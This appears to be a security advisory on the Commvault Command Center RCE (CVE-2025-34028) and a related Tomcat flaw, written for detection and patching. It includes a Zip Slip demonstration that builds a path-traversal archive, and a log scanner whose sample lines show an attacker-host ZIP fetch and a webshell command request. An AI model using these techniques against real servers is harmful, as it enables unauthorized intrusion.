
Organizations running Commvault’s backup and recovery software face an immediate threat from an actively exploited, unauthenticated remote code execution (RCE) vulnerability tracked as CVE-2025-34028. The flaw affects on-premises deployments of Commvault Command Center and allows an attacker to execute arbitrary code without credentials, potentially leading to full compromise of the backup server. A proof-of-concept (PoC) exploit has been published, which is accelerating exploitation attempts globally[1].
Executive Summary for Security Leaders
The Commvault RCE vulnerability (CVE-2025-34028) is a critical risk for enterprises and managed service providers. Scored between 9.0 and 10.0 on the CVSS scale depending on the rating source, it lets an unauthenticated attacker achieve remote code execution by chaining server-side request forgery (SSRF) with path traversal. Affected versions are Commvault Command Center 11.38.0 through 11.38.19 (Innovation Release); fixes are available in 11.38.20 and 11.38.25[2].
TL;DR:
- CVE-2025-34028: Pre-auth RCE in Commvault Command Center (CVSS 9.0–10.0)
- Affected Versions: 11.38.0–11.38.19 (Windows/Linux)
- Exploit: Uses SSRF and path traversal to deploy JSP webshells
- PoC Available: Released by watchTowr Labs on GitHub
- Mitigation: Upgrade to 11.38.20+ or isolate Command Center
Technical Analysis of CVE-2025-34028
The vulnerability lies in the `deployWebpackage.do` endpoint of Commvault Command Center. An attacker hosts a malicious ZIP file on an external server, and an SSRF flaw in the endpoint causes the vulnerable system to fetch it. A path traversal sequence (`../../`) is then used to write a JSP webshell from that archive to `/reports/MetricsUpload/shell/.tmp/dist-cc/shell.jsp`, granting persistent access[3].
watchTowr Labs’ PoC demonstrates the end-to-end attack chain, including:
- SSRF to retrieve attacker-controlled ZIP
- Path traversal to bypass directory restrictions
- Automatic webshell deployment with SYSTEM/root privileges
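The write primitive in this chain is a fetched archive unpacked without checking where each entry lands. The page does not say whether the traversal sequence rides in the archive's entry names or in a request parameter, so the following added example shows the entry-name form (commonly called Zip Slip), which is the general case: a constructed ZIP with one `../../` entry, the naive extractor that writes it outside the target directory, and the hardened extractor that rejects the archive before writing anything. This is illustration code written for this page, not watchTowr's PoC or Commvault's code; the entry names, directory layout and placeholder payload are all assumptions.

```python
"""Zip Slip, the path-traversal write behind the CVE-2025-34028 chain.
Added example (not watchTowr's PoC, not Commvault code): a constructed
archive whose entry name climbs out of the extraction directory, the naive
extractor that lets it, and the hardened extractor that refuses it."""
import io
import os
import shutil
import tempfile
import zipfile

# Constructed entries: one benign, one that escapes two directories up.
# The payload string is a placeholder, not a functioning webshell.
BENIGN_ENTRY = "dist-cc/index.html"
TRAVERSAL_ENTRY = "../../shell.jsp"


def build_malicious_zip() -> bytes:
    """Produce the kind of ZIP an attacker would host for the SSRF fetch."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(BENIGN_ENTRY, "<html>benign</html>")
        zf.writestr(TRAVERSAL_ENTRY, "placeholder jsp body")
    return buf.getvalue()


def naive_extract(zip_bytes: bytes, dest: str) -> list[str]:
    """Vulnerable pattern: trust entry names and join them onto dest.
    Returns the resolved path of every file actually written."""
    written = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            target = os.path.join(dest, info.filename)  # '..' is honoured
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with open(target, "wb") as fh:
                fh.write(zf.read(info))
            written.append(os.path.realpath(target))
    return written


def safe_extract(zip_bytes: bytes, dest: str) -> list[str]:
    """Hardened: resolve every target and reject the whole archive if any
    entry would land outside dest. All entries are validated before any
    byte is written, so a bad archive leaves nothing behind."""
    dest_real = os.path.realpath(dest)
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        targets = []
        for info in zf.infolist():
            target = os.path.realpath(os.path.join(dest_real, info.filename))
            if os.path.commonpath([dest_real, target]) != dest_real:
                raise ValueError(f"zip entry escapes extraction dir: {info.filename!r}")
            targets.append((info, target))
        for info, target in targets:
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with open(target, "wb") as fh:
                fh.write(zf.read(info))
    return [t for _, t in targets]


def demo() -> dict:
    """Run both extractors on the same archive inside a scratch tree:
    root/app/webroot is the intended destination, root is two levels up.
    Returns which files escaped under the naive extractor (relative to
    root) and whether the hardened extractor blocked the archive."""
    root = os.path.realpath(tempfile.mkdtemp())
    dest = os.path.join(root, "app", "webroot")
    os.makedirs(dest)
    payload = build_malicious_zip()
    try:
        naive_paths = naive_extract(payload, dest)
        escaped = [os.path.relpath(p, root) for p in naive_paths
                   if os.path.commonpath([dest, p]) != dest]
        try:
            safe_extract(payload, os.path.join(root, "app", "webroot2"))
            blocked = False
        except ValueError:
            blocked = True
        return {"escaped": escaped, "blocked": blocked}
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    print(demo())  # {'escaped': ['shell.jsp'], 'blocked': True}
```

Python's own `ZipFile.extractall` already strips `..` components, which is why the vulnerable path above is written as a manual loop; that loop is the same shape as the `new File(dest, entry.getName())` pattern that bites in Java extractors. The check that matters is the one in `safe_extract`: resolve the joined path with `realpath` (so symlinks and `..` are collapsed) and compare its common prefix against the resolved destination, rather than string-matching on `..`.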
Detection and Mitigation
Organizations should immediately:
| Action | Details |
|---|---|
| Patch | Upgrade to Commvault 11.38.20 or 11.38.25 (or later) |
| Network Controls | Isolate Command Center from external access |
| Monitoring | Search for anomalous ZIP downloads or JSP executions |
Detection artifacts include HTTP requests to `deployWebpackage.do` that carry external URLs, and files written under `/reports/MetricsUpload/`. watchTowr also provides a detection artifact generator that can be used to seed SIEM rules[4].
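The two artifacts just described translate directly into a log hunt. The following is an added example, not watchTowr's artifact generator or anything shipped by Commvault: it parses a handful of constructed access-log lines in combined format and raises an alert for any request to `deployWebpackage.do` whose query string names a host outside the environment, and for any request for a `.jsp` under `/reports/MetricsUpload/`. The `/commandcenter/` context path, the `pkg` parameter name and the `commserve.corp.example` allowlist are placeholders; since the page does not name the SSRF parameter, the scan inspects every query value rather than one named parameter.

```python
"""Hunt for CVE-2025-34028 artifacts in web-server access logs.
Added example, not watchTowr's artifact generator and not Commvault code.
Assumptions: combined log format; the /commandcenter/ context path and the
`pkg` parameter are placeholders (every query value is checked because the
real parameter name is not given); only RFC 1918 addresses and the hosts in
TRUSTED_HOSTS count as internal fetch destinations."""
import ipaddress
import re
from urllib.parse import parse_qsl

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# A query value that names a host: optional scheme, host, optional port/path.
HOST_RE = re.compile(r'^(?:https?://)?([A-Za-z0-9.-]+)(?::\d+)?(?:/.*)?$')
WEBSHELL_RE = re.compile(r'/reports/MetricsUpload/.*\.jsp$', re.IGNORECASE)
RFC1918 = [ipaddress.ip_network(n) for n in
           ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]
TRUSTED_HOSTS = {"commserve.corp.example"}  # assumed: the CommServe's own name

# Constructed sample lines, not a real capture.
SAMPLE_LOG = """\
203.0.113.9 - - [22/Apr/2025:10:01:12 +0000] "GET /commandcenter/deployWebpackage.do?pkg=http://203.0.113.9:8000/evil.zip HTTP/1.1" 200 512 "-" "curl/8.6.0"
10.20.30.40 - - [22/Apr/2025:10:02:40 +0000] "GET /commandcenter/deployWebpackage.do?pkg=http://commserve.corp.example/pkg.zip HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [22/Apr/2025:10:03:05 +0000] "POST /commandcenter/deployWebpackage.do?pkg=198.51.100.7:8080 HTTP/1.1" 200 77 "-" "curl/8.6.0"
203.0.113.9 - - [22/Apr/2025:10:03:09 +0000] "GET /commandcenter/reports/MetricsUpload/shell/.tmp/dist-cc/shell.jsp?cmd=id HTTP/1.1" 200 1024 "-" "curl/8.6.0"
10.0.0.5 - - [22/Apr/2025:10:05:00 +0000] "GET /commandcenter/login.do HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
"""


def host_of(value: str):
    """Return the host a query value points at, or None if it is not one."""
    m = HOST_RE.match(value)
    if not m:
        return None
    host = m.group(1)
    try:
        ipaddress.ip_address(host)
        return host
    except ValueError:
        # Require a dotted name containing letters so version-like values
        # such as "11.38" are not mistaken for hostnames.
        return host if "." in host and any(c.isalpha() for c in host) else None


def is_internal(host: str) -> bool:
    """RFC 1918 addresses and allowlisted names are legitimate fetch targets."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return host in TRUSTED_HOSTS
    return any(ip in net for net in RFC1918)


def external_targets(query: str) -> list[str]:
    """Query values that would point the server at a host outside the environment."""
    hits = []
    for _, value in parse_qsl(query, keep_blank_values=True):
        host = host_of(value)
        if host and not is_internal(host):
            hits.append(value)
    return hits


def scan(lines) -> list[dict]:
    """Apply both rules to each log line and return the alerts in order."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        path, _, query = m["target"].partition("?")
        base = {"src": m["src"], "ts": m["ts"], "status": m["status"]}
        if path.endswith("/deployWebpackage.do"):
            targets = external_targets(query)
            if targets:
                alerts.append({**base, "rule": "ssrf_fetch", "targets": targets})
        elif WEBSHELL_RE.search(path):
            alerts.append({**base, "rule": "webshell_path", "path": path})
    return alerts


if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG.splitlines()):
        print(alert)
```

Two points worth carrying into a real SIEM rule: first, match on the resolved host of the fetch target, not on the string `http://`, because a bare `host:port` value (the third sample line) points the server at the same place; second, treat any request for a `.jsp` under `/reports/MetricsUpload/` as a hit regardless of status code, since a 200 there means the webshell already exists and a 404 is still an attacker probing for one.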
Related Threat: Apache Tomcat RCE (CVE-2025-24813)
Simultaneously, attackers are exploiting CVE-2025-24813 in Apache Tomcat (versions 9.0.0-M1 through 9.0.98, 10.1.0-M1 through 10.1.34, and 11.0.0-M1 through 11.0.2). The flaw abuses partial PUT requests to plant a malicious file via path equivalence, but exploitation requires non-default configuration: the DefaultServlet must have writes enabled (`readonly` set to `false`), and turning the file write into RCE additionally relies on file-based session persistence and a deserialization gadget on the classpath. GreyNoise reports 4 unique IPs targeting U.S. systems[5].
Conclusion
The Commvault vulnerability represents a severe threat to backup infrastructure, a frequent target for ransomware groups. Immediate patching is critical, supplemented by network segmentation and log analysis. The concurrent Tomcat exploitation underscores the need for comprehensive vulnerability management across all enterprise systems.
References
- “Commvault RCE Vulnerability Exploited—PoC Released,” GBHackers Security, 2025.
- Commvault Security Advisory CV_2025_04_1, 2025.
- watchTowr Labs, “Commvault PreAuth RCE Exploit,” GitHub, 2025.
- “Critical Commvault RCE Vulnerability Fixed,” HelpNet Security, 2025.
- “Active Exploitation of Apache Tomcat RCE,” GreyNoise, 2025.